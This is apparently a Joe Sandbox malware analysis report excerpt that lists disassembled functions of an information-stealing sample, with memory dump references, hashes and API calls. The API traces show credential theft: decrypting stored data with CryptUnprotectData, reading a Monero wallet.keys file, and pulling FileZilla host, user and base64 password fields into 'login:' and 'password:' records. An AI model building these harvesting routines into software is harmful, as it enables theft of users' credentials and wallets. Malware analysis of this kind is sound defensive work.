                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 47ffcb4e74386ccd04f8d7fa096ab2b175255c536a2016891e72a0ef228a3f5b
                        • Instruction ID: 7f92b8bb95c06ca9a372be9fc055a1ef10e2c40b8cc1cbe940197c0cad6fde46
                        • Opcode Fuzzy Hash: 47ffcb4e74386ccd04f8d7fa096ab2b175255c536a2016891e72a0ef228a3f5b
                        • Instruction Fuzzy Hash: 7B410974A40A289FDB24DB58CC95BDBB7B4BB48702F4041D8E609AB2D4D7716EC5CF50
                        Function 01009B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01009B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 01009BA3
                        • LocalFree.KERNEL32(?), ref: 01009BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 3f38416d96ed4a7ad7372baa0d595b45cd3a46e831c3a6e3a8949c0f7ac84931
                        • Instruction ID: 008f55ffebc9b11d2acb781bf53c199cae84d197d0a273df46091fa91efe7f1a
                        • Opcode Fuzzy Hash: 3f38416d96ed4a7ad7372baa0d595b45cd3a46e831c3a6e3a8949c0f7ac84931
                        • Instruction Fuzzy Hash: 3711CCB8A00209EFDB05DF98D989AAE77F5FF88304F104598E91597394D774AE10CF61
                        Function 013AFDC1 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <ozl
                        • API String ID: 0-1239853079
                        • Opcode ID: 01141148a78db85e5c3e64661e113679442eb46bdf973c830f9b09f74fafd9f2
                        • Instruction ID: afe081d7b2ef0a77067e34221dd3df1b1515127355c36ff91c17e47c16e0d2fd
                        • Opcode Fuzzy Hash: 01141148a78db85e5c3e64661e113679442eb46bdf973c830f9b09f74fafd9f2
                        • Instruction Fuzzy Hash: 846136F3E182105BF3149A2DDC4577AB6D6DBD4320F2A863DDAD4C7784E83D8C058282
                        Function 0138D6FB Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: bQ&S
                        • API String ID: 0-3970508665
                        • Opcode ID: 619a69bf201c9f9af9555a850255684934baccd02d29dbf48aef620c672a41a5
                        • Instruction ID: 63e01f84e9c7275844b30f8d8bafe267a5d9681f7126076bcc6ec978b7bef083
                        • Opcode Fuzzy Hash: 619a69bf201c9f9af9555a850255684934baccd02d29dbf48aef620c672a41a5
                        • Instruction Fuzzy Hash: 3F518BF7A092009FE30C6A3DDC6577ABAD7E7D4320F2B853DD68683788ED3958054286
                        Function 0133FCC7 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ftz
                        • API String ID: 0-3264785279
                        • Opcode ID: 62a1fcf1397a21891c4856d36d8289f4d280914058a9989909c5b20aedb84137
                        • Instruction ID: 66bcc8293a9009e0bf1c95b2316d61fcc07ec063a22b1b3df182383c9eb32465
                        • Opcode Fuzzy Hash: 62a1fcf1397a21891c4856d36d8289f4d280914058a9989909c5b20aedb84137
                        • Instruction Fuzzy Hash: 9031F7F39083109BF3046A29DC5576ABBD5DF94720F1A853EDAC8D7780E9795840C792
                        Function 01330EAC Relevance: .2, Instructions: 240COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f375491232def1d2b88184a1c120d414d842f3e9ca17c2aa0dd58f7c07fb2cb7
                        • Instruction ID: c060384bcbc0c60b457426096b4f90d7cdc7ac00b2f94215fd252eece9620468
                        • Opcode Fuzzy Hash: f375491232def1d2b88184a1c120d414d842f3e9ca17c2aa0dd58f7c07fb2cb7
                        • Instruction Fuzzy Hash: 687159F3A082045BE3046D2ADC8877AF7D6EBD4320F1A453DD7C8C3784ED7A58458686
                        Function 01688013 Relevance: .1, Instructions: 127COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e9ac39fe89a7e4a724b8fdaad199213c2e0ab7449d2bf79227f7984295fc139
                        • Instruction ID: eaac0ddb4466129b4adc068e80fb19448fd7d3b58110290241544e2fb57ca1a5
                        • Opcode Fuzzy Hash: 6e9ac39fe89a7e4a724b8fdaad199213c2e0ab7449d2bf79227f7984295fc139
                        • Instruction Fuzzy Hash: 5D419FF29086009FE345BF39DC8666AF7E9EF99320F168A2DD6C5C7350E63494408B97
                        Function 0168804E Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47aea4e46d12ea58f265a9784a53fc0cf21d274bb3ee8d4ba791b7b371a0cade
                        • Instruction ID: c55ef5c6ed184b722d4e29d3527f7515921ec99b087b7c107c7e603072e5c8cb
                        • Opcode Fuzzy Hash: 47aea4e46d12ea58f265a9784a53fc0cf21d274bb3ee8d4ba791b7b371a0cade
                        • Instruction Fuzzy Hash: 4931A0F29086009FE345EF29DC8676AF7E5EF98320F168A2DD6D9C7350E63494408B57
                        Function 014547F8 Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9711c78ab2dd55c5839f4befe93a73e7e032095609caa5dac760932d739c704
                        • Instruction ID: 3f6e031bc2375575c28f566a170da8f72ef5b675039da093423b48065a66c869
                        • Opcode Fuzzy Hash: e9711c78ab2dd55c5839f4befe93a73e7e032095609caa5dac760932d739c704
                        • Instruction Fuzzy Hash: 053139B290C3189FD3117F69D84566AFBE8EF94710F06082DEAD483750EB346854CB9B
                        Function 01019750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 01010250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,01020DBA,01020DB7,01020DB6,01020DB3), ref: 01010362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01010369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 01010385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 010103CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 010103DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 01010419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 01010463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 0101051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 01010532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 0101054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 01010562
                        • lstrcat.KERNEL32(?,profile: null), ref: 01010571
                        • lstrcat.KERNEL32(?,url: ), ref: 01010580
                        • lstrcat.KERNEL32(?,00000000), ref: 01010593
                        • lstrcat.KERNEL32(?,01021678), ref: 010105A2
                        • lstrcat.KERNEL32(?,00000000), ref: 010105B5
                        • lstrcat.KERNEL32(?,0102167C), ref: 010105C4
                        • lstrcat.KERNEL32(?,login: ), ref: 010105D3
                        • lstrcat.KERNEL32(?,00000000), ref: 010105E6
                        • lstrcat.KERNEL32(?,01021688), ref: 010105F5
                        • lstrcat.KERNEL32(?,password: ), ref: 01010604
                        • lstrcat.KERNEL32(?,00000000), ref: 01010617
                        • lstrcat.KERNEL32(?,01021698), ref: 01010626
                        • lstrcat.KERNEL32(?,0102169C), ref: 01010635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01020DB2), ref: 0101068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
